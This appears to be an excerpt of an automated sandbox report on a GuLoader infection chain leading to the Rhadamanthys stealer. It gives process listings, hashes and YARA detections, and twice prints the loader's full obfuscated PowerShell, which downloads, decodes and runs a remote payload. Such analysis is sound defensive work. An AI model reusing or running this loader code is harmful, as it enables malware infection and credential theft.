                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                        Start time:12:48:04
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                        Start time:12:48:05
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Banky='Myohemoglobin';;$Tadpolelikemmute='Cineangiocardiography';;$Hovedkatalogernes='Tilbagekobling';;$Festsalenes='Gryde';;$Tadpolelikendustri=$host.Name;function ectethmoid($Reskompagnierne){If ($Tadpolelikendustri) {$Endogamic=2} for ($Tadpolelike=$Endogamic;;$Tadpolelike+=3){if(!$Reskompagnierne[$Tadpolelike]){$Forthcoming++;break }$Trillers+=$Reskompagnierne[$Tadpolelike];$Disrobes='Kogeplader'}$Trillers}function Allestedsnrvrende($Gentlemanise7){ .($Iserine) ($Gentlemanise7)}$hyetometric=ectethmoid 'Srn peoft H.trw';$hyetometric+=ectethmoid 'A.E bSnc PLNeI je .nBuT';$Slavepen=ectethmoid 'EnM Pocuz,fi Pl .lInaFo/';$Germanizer162=ectethmoid 'JuTTrlYas.e1I 2';$kreditstramningen='S [StN rE tSo.CosO.E.eR.ovStiAdC tEBePPaO ki nCatB mTeaStnOvaA.greEkrR ] ,:Ne:s,SBoEsuCNoUHyr,oi TTBuYElp ARanOSetDooc.C OSpLSu=An$F.GCaE BrE.mBoaAdnBri AzF E nRJe1 K6 S2';$Slavepen+=ectethmoid ' C5 ,. M0 i Tr( jW iFrnSydFao uwBrser UnNViTSa R 1Ka0B,.Li0Ph; o .dWs i in B6 v4O ;E, HexTr6Fl4Ca;Ri rrR v n:V,1Re3B.1 x.af0 .)Sp GRrel cjekSto r/Ra2S 0Ap1P 0.a0Sk1Po0Ji1 a FaFSui OrFueR,fLro.axMu/Az1 m3In1Ci. o0';$campi=ectethmoid 'CuUDuS KE BROp- aDegaseR N T';$agreed=ectethmoid 'S.hDit ht ,pLes :D./ l/ ,wUnwh w A.Arf otFosCeeUmn ngO i CnBre AeS rHusAs.UncYdo em e/ iCotP /RoE smSonFaeDyrFlnAdeSpsPr1Me2Pa3Gr..amPrdUnp >SyhSatS tnopSls,u:tr/Ma/ UwMiwB wRa. rpTeuStn BeLue .tFa. uaFueaa/PoiFotMe/ EOtmClnBeeArrTinTieKls 1P.2 3Dr.B.m d p';$Untemporally=ectethmoid 'Un>';$Iserine=ectethmoid ' I,te X';$Wordpro='Ankomststationens';$Husven='\Exultet.Bid';Allestedsnrvrende (ectethmoid 'Ud$ iGkrLAnoUnBBiaNelBo:Omg cnPea.mv in FI nn.ngky=Hj$.eevaN pVLo:phaRuPAfpUdDFoaalt,aaV + $Guh Su MsUnvLoe.uN');Allestedsnrvrende (ectethmoid 'In$CoGPalB OVabGuaFolUn:BasMev niv.NKae s i=Km$KaaRegm,R PE BE .d V.K SApP SlSuiDeTMe(To$ GURenNetToe vmShPFoo.rRBaaVaLA LBayW,)');Allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$Svines[0];$Montmartre=(ectethmoid 'U $P GS LTao tb Pa Il,o: oG Bo lnPidSuOAnl tILnE SRVa=R,NBueB W.n-SaOH B nJXee.eC tBu TusUnyFlsN TD,E ,mIn.De$BuHM Y ,eSiT osyM ,eCaT R,diCoC');Allestedsnrvrende ($Montmartre);Allestedsnrvrende (ectethmoid 'Ka$I GY obenPed.ao jlCai,teH.rS . oHS eH aHad AeH r sOv[ n$A cR a ImR p TiLe]K =Ba$D,SMilGla gv ae pafeRen');$Linievogternes=ectethmoid 'Po$ChGS oClnPjdS.oMolLaiVieDar ..,qDSyoVew nMol ,oO,a KdFlFEkiPelP.eBe( $ PaSng.erPoeGre .dk ,Tr$QuBPreK gK,yRan.ad eFalSmsToe.esBeltei Fn njAfeLerStn eLu1 r0tu9Aa)';$Begyndelseslinjerne109=$Gnavning;Allestedsnrvrende (ectethmoid ' f$G gB L .oYab.iaHeLA :VuC DI,oV oI ulovbApeHeS oKM YFot tSyE Sl osfnEIns p= H( Pt BE.es dtEu-ScpD,ajuTPrH.i Yi$Idb PeSoGOpy n eDMeeBelK sMuEW,S yLHviHenBojBaE RUdNSnE A1,u0sk9U.)');while (!$Civilbeskyttelses) {Allestedsnrvrende (ectethmoid 'In$DigLylS o Ab HaK,lUd: rPInu hr EiFrfAci CeE dPu= $ oUagnF d eH rSkb neIltDraBelButK ePhsCr1M 9 T1') ;Allestedsnrvrende $Linievogternes;Allestedsnrvrende (ectethmoid 'SesLiT,eAForC.TPl-SgSEllSaE,ve nPEm I 4');Allestedsnrvrende (ectethmoid 'Ko$ ,GellBaoAvBJoaFrl p:S cUdI VBlI llnobR EUdSknk By otTrtSteLaLThSToE s G=Tr(M.T TETesCotUn-,lpFuaFatToh i Re$O.bPeEB.g YMen DDBoeS LN SG.EC s LVii on ojI ESkRliN .e B1As0F.9Ar)') ;Allestedsnrvrende (ectethmoid ' M$JeG RLU.oSybBiA .LTi: JrAlE GKoI.lsAftnirSuEScrB.iHinHoGOpSUnNS UEnMA MAreSpr.us F=En$M,G iLNooLgb nA.alM.:J KFlNNeu aB .SLiE.o+Ru+ r%Un$ NSP VFoiUnNMee SUn. CCaoG Ud NInt') ;$agreed=$Svines[$Registreringsnummers]}$Djvelskabers=282895;$Unpreparedness=28214;Allestedsnrvrende (ectethmoid 'H $ChGafL OH,bRaa ,l.e:BoSHeH ,yDylOpOBoC ek TeS d I sa=K igEkE BtH - FCDooRenInt FeIln HtCr Ti$FiB Nep,gU yE NTaDB E Il BSIneM,SLel LiMinI j.aeA.RFrNAne,u1.g0Ge9');Allestedsnrvrende (ectethmoid 'Pr$ g Dl,oo BbNaaPslRe:poD AdSvnS iCan,ygtje ,n W ,d=Un k[AfSIsy .sInt EeM mSk. SCBao an LvB eTyrmotE ]Ma:Bo: MF Fr ,oPhm BA asesHuePr6Ma4KrSKotCrr .i.unA.gS.(Co$,aSS hhyyG lMoosycRek ee adOv)');Allestedsnrvrende (ectethmoid 'Pa$Hjg BlD,o FB,nALalOc: ,kDka.inBut HsC.TPoeO n eLonEfS i Bo= I M,[FossaYFeSUnt EUnMCo.KaT.ee .xChTG .,deGrNReCBoOPrd .iR ND G ] F:.a: HaReS.ac EIchIGr.l gTleStt s Ct eRVeiF n fg.a(Fo$HiDFrdAlnAnI,eNcrgpoEDinhy)');Allestedsnrvrende (ectethmoid 'Ca$,ogbol eOMoBXaA CLMa:m tmaI ,lErSBrKStA dAiEA,KP O UmDaNEpeMo=F $EgKSeaHjN nT S eT PeRon Be,lnWasth. iS eUU BS sAltCorR iStn MGS (Fo$PedInjDav E ClM sSekEmaU.B GeFlRDiSBu,Sa$Beu NnUnpB,rGae,np EA Fr.eE iDErNEne .sM Ssn)');Allestedsnrvrende $Tilskadekomne;"
                                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.1889715255.000001E368665000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                        Start time:12:48:05
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                        Start time:12:48:16
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Banky='Myohemoglobin';;$Tadpolelikemmute='Cineangiocardiography';;$Hovedkatalogernes='Tilbagekobling';;$Festsalenes='Gryde';;$Tadpolelikendustri=$host.Name;function ectethmoid($Reskompagnierne){If ($Tadpolelikendustri) {$Endogamic=2} for ($Tadpolelike=$Endogamic;;$Tadpolelike+=3){if(!$Reskompagnierne[$Tadpolelike]){$Forthcoming++;break }$Trillers+=$Reskompagnierne[$Tadpolelike];$Disrobes='Kogeplader'}$Trillers}function Allestedsnrvrende($Gentlemanise7){ .($Iserine) ($Gentlemanise7)}$hyetometric=ectethmoid 'Srn peoft H.trw';$hyetometric+=ectethmoid 'A.E bSnc PLNeI je .nBuT';$Slavepen=ectethmoid 'EnM Pocuz,fi Pl .lInaFo/';$Germanizer162=ectethmoid 'JuTTrlYas.e1I 2';$kreditstramningen='S [StN rE tSo.CosO.E.eR.ovStiAdC tEBePPaO ki nCatB mTeaStnOvaA.greEkrR ] ,:Ne:s,SBoEsuCNoUHyr,oi TTBuYElp ARanOSetDooc.C OSpLSu=An$F.GCaE BrE.mBoaAdnBri AzF E nRJe1 K6 S2';$Slavepen+=ectethmoid ' C5 ,. M0 i Tr( jW iFrnSydFao uwBrser UnNViTSa R 1Ka0B,.Li0Ph; o .dWs i in B6 v4O ;E, HexTr6Fl4Ca;Ri rrR v n:V,1Re3B.1 x.af0 .)Sp GRrel cjekSto r/Ra2S 0Ap1P 0.a0Sk1Po0Ji1 a FaFSui OrFueR,fLro.axMu/Az1 m3In1Ci. o0';$campi=ectethmoid 'CuUDuS KE BROp- aDegaseR N T';$agreed=ectethmoid 'S.hDit ht ,pLes :D./ l/ ,wUnwh w A.Arf otFosCeeUmn ngO i CnBre AeS rHusAs.UncYdo em e/ iCotP /RoE smSonFaeDyrFlnAdeSpsPr1Me2Pa3Gr..amPrdUnp >SyhSatS tnopSls,u:tr/Ma/ UwMiwB wRa. rpTeuStn BeLue .tFa. uaFueaa/PoiFotMe/ EOtmClnBeeArrTinTieKls 1P.2 3Dr.B.m d p';$Untemporally=ectethmoid 'Un>';$Iserine=ectethmoid ' I,te X';$Wordpro='Ankomststationens';$Husven='\Exultet.Bid';Allestedsnrvrende (ectethmoid 'Ud$ iGkrLAnoUnBBiaNelBo:Omg cnPea.mv in FI nn.ngky=Hj$.eevaN pVLo:phaRuPAfpUdDFoaalt,aaV + $Guh Su MsUnvLoe.uN');Allestedsnrvrende (ectethmoid 'In$CoGPalB OVabGuaFolUn:BasMev niv.NKae s i=Km$KaaRegm,R PE BE .d V.K SApP SlSuiDeTMe(To$ GURenNetToe vmShPFoo.rRBaaVaLA LBayW,)');Allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$Svines[0];$Montmartre=(ectethmoid 'U $P GS LTao tb Pa Il,o: oG Bo lnPidSuOAnl tILnE SRVa=R,NBueB W.n-SaOH B nJXee.eC tBu TusUnyFlsN TD,E ,mIn.De$BuHM Y ,eSiT osyM ,eCaT R,diCoC');Allestedsnrvrende ($Montmartre);Allestedsnrvrende (ectethmoid 'Ka$I GY obenPed.ao jlCai,teH.rS . oHS eH aHad AeH r sOv[ n$A cR a ImR p TiLe]K =Ba$D,SMilGla gv ae pafeRen');$Linievogternes=ectethmoid 'Po$ChGS oClnPjdS.oMolLaiVieDar ..,qDSyoVew nMol ,oO,a KdFlFEkiPelP.eBe( $ PaSng.erPoeGre .dk ,Tr$QuBPreK gK,yRan.ad eFalSmsToe.esBeltei Fn njAfeLerStn eLu1 r0tu9Aa)';$Begyndelseslinjerne109=$Gnavning;Allestedsnrvrende (ectethmoid ' f$G gB L .oYab.iaHeLA :VuC DI,oV oI ulovbApeHeS oKM YFot tSyE Sl osfnEIns p= H( Pt BE.es dtEu-ScpD,ajuTPrH.i Yi$Idb PeSoGOpy n eDMeeBelK sMuEW,S yLHviHenBojBaE RUdNSnE A1,u0sk9U.)');while (!$Civilbeskyttelses) {Allestedsnrvrende (ectethmoid 'In$DigLylS o Ab HaK,lUd: rPInu hr EiFrfAci CeE dPu= $ oUagnF d eH rSkb neIltDraBelButK ePhsCr1M 9 T1') ;Allestedsnrvrende $Linievogternes;Allestedsnrvrende (ectethmoid 'SesLiT,eAForC.TPl-SgSEllSaE,ve nPEm I 4');Allestedsnrvrende (ectethmoid 'Ko$ ,GellBaoAvBJoaFrl p:S cUdI VBlI llnobR EUdSknk By otTrtSteLaLThSToE s G=Tr(M.T TETesCotUn-,lpFuaFatToh i Re$O.bPeEB.g YMen DDBoeS LN SG.EC s LVii on ojI ESkRliN .e B1As0F.9Ar)') ;Allestedsnrvrende (ectethmoid ' M$JeG RLU.oSybBiA .LTi: JrAlE GKoI.lsAftnirSuEScrB.iHinHoGOpSUnNS UEnMA MAreSpr.us F=En$M,G iLNooLgb nA.alM.:J KFlNNeu aB .SLiE.o+Ru+ r%Un$ NSP VFoiUnNMee SUn. CCaoG Ud NInt') ;$agreed=$Svines[$Registreringsnummers]}$Djvelskabers=282895;$Unpreparedness=28214;Allestedsnrvrende (ectethmoid 'H $ChGafL OH,bRaa ,l.e:BoSHeH ,yDylOpOBoC ek TeS d I sa=K igEkE BtH - FCDooRenInt FeIln HtCr Ti$FiB Nep,gU yE NTaDB E Il BSIneM,SLel LiMinI j.aeA.RFrNAne,u1.g0Ge9');Allestedsnrvrende (ectethmoid 'Pr$ g Dl,oo BbNaaPslRe:poD AdSvnS iCan,ygtje ,n W ,d=Un k[AfSIsy .sInt EeM mSk. SCBao an LvB eTyrmotE ]Ma:Bo: MF Fr ,oPhm BA asesHuePr6Ma4KrSKotCrr .i.unA.gS.(Co$,aSS hhyyG lMoosycRek ee adOv)');Allestedsnrvrende (ectethmoid 'Pa$Hjg BlD,o FB,nALalOc: ,kDka.inBut HsC.TPoeO n eLonEfS i Bo= I M,[FossaYFeSUnt EUnMCo.KaT.ee .xChTG .,deGrNReCBoOPrd .iR ND G ] F:.a: HaReS.ac EIchIGr.l gTleStt s Ct eRVeiF n fg.a(Fo$HiDFrdAlnAnI,eNcrgpoEDinhy)');Allestedsnrvrende (ectethmoid 'Ca$,ogbol eOMoBXaA CLMa:m tmaI ,lErSBrKStA dAiEA,KP O UmDaNEpeMo=F $EgKSeaHjN nT S eT PeRon Be,lnWasth. iS eUU BS sAltCorR iStn MGS (Fo$PedInjDav E ClM sSekEmaU.B GeFlRDiSBu,Sa$Beu NnUnpB,rGae,np EA Fr.eE iDErNEne .sM Ssn)');Allestedsnrvrende $Tilskadekomne;"
                                                                                                                                                                                        Imagebase:0x6d0000
                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.2125078968.0000000008140000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.2111304892.000000000527A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.2125331171.0000000008A43000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                        Start time:12:48:16
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                        Start time:12:48:25
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Public\lsm5k8gou5bjv.xlsx"
                                                                                                                                                                                        Imagebase:0x6c0000
                                                                                                                                                                                        File size:53'161'064 bytes
                                                                                                                                                                                        MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                        Start time:12:48:27
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                        Start time:12:48:40
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                                                                        Imagebase:0x30000
                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000010.00000003.2268036738.0000000020B60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000010.00000003.2266888883.0000000004603000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000003.2265412347.0000000021160000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000010.00000003.2263199708.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000003.2265773388.0000000021380000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                        Start time:12:48:58
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                                                        Imagebase:0x50000
                                                                                                                                                                                        File size:46'504 bytes
                                                                                                                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000011.00000003.2268669701.0000000005A80000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000011.00000003.2268437168.0000000005860000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000011.00000003.2266293823.00000000033E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000011.00000002.2356833035.0000000003950000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                        Start time:12:49:07
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                        Start time:12:49:19
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr8548.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a9b905ba/4a1b3c1a"
                                                                                                                                                                                        Imagebase:0x7ff76e190000
                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                        Start time:12:49:20
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2044,i,7050312462197299471,10248190521598653203,262144 /prefetch:8
                                                                                                                                                                                        Imagebase:0x7ff76e190000
                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                        Start time:12:49:30
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Windows\splwow64.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\splwow64.exe 8192
                                                                                                                                                                                        Imagebase:0x7ff74ff40000
                                                                                                                                                                                        File size:163'840 bytes
                                                                                                                                                                                        MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                        Start time:12:49:38
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Program Files\Windows Media Player\wmpshare.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Program Files\Windows Media Player\wmpshare.exe"
                                                                                                                                                                                        Imagebase:0x7ff7bd060000
                                                                                                                                                                                        File size:106'496 bytes
                                                                                                                                                                                        MD5 hash:A89F75B51EAADA8C97F8D674B3EDB2F2
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                        Start time:12:49:43
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\system32\dllhost.exe"
                                                                                                                                                                                        Imagebase:0x7ff70f330000
                                                                                                                                                                                        File size:21'312 bytes
                                                                                                                                                                                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Disassembly

                                                                                                                                                                                        Reset < >

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00007FFD9B7E33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.3041280048.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                          • Instruction ID: 347eb46863d0610c54c5e9c05e70889870b2352b4ba84a369cc0dc72dc0b729b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D01A73020CB0C4FD748EF0CE051AA5B3E0FF85320F10056DE58AC36A1DA32E882CB41

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00007FFD9B898FED Relevance: 5.4, Strings: 3, Instructions: 1612COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.1903456474.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                                          Similarity
